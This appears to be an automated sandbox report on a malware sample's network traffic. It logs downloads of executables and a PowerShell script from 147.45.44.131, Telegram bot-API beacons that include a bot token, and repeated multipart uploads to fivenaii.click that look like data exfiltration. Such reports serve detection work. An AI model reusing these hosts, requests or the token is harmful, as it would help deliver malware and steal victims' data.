            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 21:33:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 16:22:08 GMTETag: "4c000-62a1aa1957b5c"Accept-Ranges: bytesContent-Length: 311296Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 86 59 69 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 b2 00 00 00 00 00 00 00 86 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 5c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3d 04 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 09 04 00 00 10 00 00 00 0a 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bd 20 00 00 00 20 04 00 00 22 00 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 d6 00 00 00 50 04 00 00 54 00 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 3b 00 00 00 30 05 00 00 3c 00 00 00 84 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49761 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49769 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49770 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49774 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49762 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49776 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49764 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49768 -> 104.21.60.24:443
            Source: global trafficHTTP traffic detected: POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 0Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 0Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 0Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 0Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K29GIXJ1E8TBCVOBTVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6G55XVIVJGCYD2KDH6PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8795Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K1R1QCQ80Y27RGQNZZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C9M7QTVU9XVV7VB4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1272Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L0O4KIZ8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18108Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CP7BM4U9RCKUZ8RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8771Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NK6VN6CQ4BZSATYGEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571134Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XMTXEG4X2SM0IQWLM8FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20448Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5Q02JBRDU7U42EAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6DGF095Y82K79M6XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18156Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FRHHII88EX2SEMY7YYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9KREDXIF8S0UJ1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571116Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K0RL857YU4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20394Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LO675W50User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1189Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E8126BCFDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571086Host: fivenaii.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fivenaii.click
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/pilgm.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
            Source: global trafficHTTP traffic detected: GET /infopage/pilgm.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
            Source: global trafficHTTP traffic detected: GET /infopage/pilgm.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
            Source: global trafficHTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/pilgm.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
            Source: global trafficHTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: fivenaii.click
            Source: unknownHTTP traffic detected: POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 0Connection: Keep-Alive
            Source: powershell.exe, 00000018.00000002.1835577839.0000000004783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1835577839.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.00000000050D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.0000000005814000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
